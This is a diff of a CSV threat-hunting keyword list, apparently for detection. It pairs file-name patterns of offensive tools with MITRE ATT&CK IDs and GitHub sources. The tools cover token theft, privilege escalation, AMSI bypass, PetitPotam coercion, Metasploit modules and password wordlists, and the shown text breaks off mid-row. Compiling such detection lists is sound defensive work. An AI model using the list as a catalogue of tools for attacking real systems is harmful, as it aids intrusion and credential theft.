"*TokenDump.exe*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" "*TokenKidnapping.cpp*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" -"*TokenKidnapping.cpp*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","876","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" +"*TokenKidnapping.cpp*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","877","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" "*TokenKidnapping.exe*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" -"*tokenprivs.cpp*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" -"*tokenprivs.exe*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*tokenprivs.cpp*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*tokenprivs.exe*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" "*TokenStealing.cs*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" "*TokenStealing.exe*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" -"*TokenStomp.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*TokenStomp.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*TokenStripBOF/src*","offensive_tool_keyword","cobaltstrike","Beacon Object File to delete token privileges and lower the integrity level to untrusted for a specified process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nick-frischkorn/TokenStripBOF","1","1","N/A","10","10","28","5","2022-06-15T21:29:24Z","2022-06-15T02:13:13Z" -"*TokenTactics.psd1*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","439","67","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" -"*TokenTactics.psm1*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","439","67","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" -"*TokenTactics-main.zip*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","439","67","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" +"*TokenTactics.psd1*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" +"*TokenTactics.psm1*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" +"*TokenTactics-main.zip*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" "*Tokenvator*","offensive_tool_keyword","Tokenvator","A tool to alter privilege with Windows Tokens","T1055 - T1003 - T1134","TA0004 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" "*Tokenvator*.exe*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" "*Tokenvator.csproj*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" @@ -17785,27 +17969,27 @@ "*token-vault.x64.o*","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","1","N/A","10","10","128","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" "*token-vault.x86.o*","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","1","N/A","10","10","128","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" "*TokenViewer.exe*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" -"*tokyoneon/Chimera*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1187","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" -"*tomcarver16/ADSearch*","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","1","N/A","N/A","4","370","44","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z" -"*tomcat_mgr_default_userpass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*tokyoneon/Chimera*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*tomcarver16/ADSearch*","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","1","N/A","N/A","4","371","44","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z" +"*tomcat_mgr_default_userpass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*tomcat-rootprivesc-deb.sh*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*tomcatWarDeployer -v -x -p * -H * ","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*Tool-PassView*","offensive_tool_keyword","Tool-PassView","Password recovery or exploitation","T1003 - T1021 - T1056 - T1110 - T1212","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/password_recovery_tools.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*tools/ligolo*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","0","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*top100_sublist.txt*","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","N/A","6","10","1221","192","2023-09-11T05:26:53Z","2019-08-07T14:32:53Z" "*top1000_sublist.txt*","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","N/A","6","10","1221","192","2023-09-11T05:26:53Z","2019-08-07T14:32:53Z" -"*Top109Million-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1614","2021-12-21T18:14:59Z","2017-04-16T17:08:27Z" -"*Top12Thousand-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1614","2021-12-21T18:14:59Z","2017-04-16T17:08:27Z" -"*Top1575-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1614","2021-12-21T18:14:59Z","2017-04-16T17:08:27Z" -"*Top1pt6Million-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1614","2021-12-21T18:14:59Z","2017-04-16T17:08:27Z" -"*Top207-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1614","2021-12-21T18:14:59Z","2017-04-16T17:08:27Z" -"*Top29Million-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1614","2021-12-21T18:14:59Z","2017-04-16T17:08:27Z" -"*Top2Billion-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1614","2021-12-21T18:14:59Z","2017-04-16T17:08:27Z" -"*Top304Thousand-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1614","2021-12-21T18:14:59Z","2017-04-16T17:08:27Z" -"*Top353Million-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1614","2021-12-21T18:14:59Z","2017-04-16T17:08:27Z" -"*topotam.exe*","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","1590","272","2023-07-23T17:07:07Z","2021-07-18T18:19:54Z" -"*topotam/PetitPotam*","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","1590","272","2023-07-23T17:07:07Z","2021-07-18T18:19:54Z" -"*tor_hiddenservices.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*Top109Million-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1615","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" +"*Top12Thousand-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1615","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" +"*Top1575-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1615","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" +"*Top1pt6Million-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1615","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" +"*Top207-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1615","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" +"*Top29Million-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1615","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" +"*Top2Billion-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1615","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" +"*Top304Thousand-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1615","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" +"*Top353Million-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1615","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" +"*topotam.exe*","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","1591","272","2023-07-23T17:07:07Z","2021-07-18T18:19:54Z" +"*topotam/PetitPotam*","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","1591","272","2023-07-23T17:07:07Z","2021-07-18T18:19:54Z" +"*tor_hiddenservices.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*tor_services.py*","offensive_tool_keyword","Tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion - Data Exfiltration","https://github.com/r0oth3x49/Tor","1","1","N/A","N/A","2","148","44","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z" "*TORAnonymizer.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" "*TorBrowser-*macos_ALL.dmg*","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -17818,63 +18002,63 @@ "*TorPylle*","offensive_tool_keyword","TorPylle","A Python / Scapy implementation of the OR (TOR) protocol.","T1573 - T1572 - T1553 - T1041 - T1090","TA0002 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/cea-sec/TorPylle","1","0","N/A","N/A","1","91","23","2021-10-03T18:08:41Z","2013-07-23T11:38:39Z" "*TorServiceSetup*","offensive_tool_keyword","Tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion - Data Exfiltration","https://github.com/r0oth3x49/Tor","1","0","N/A","N/A","2","148","44","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z" "*totally legit pdf.pdf*","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 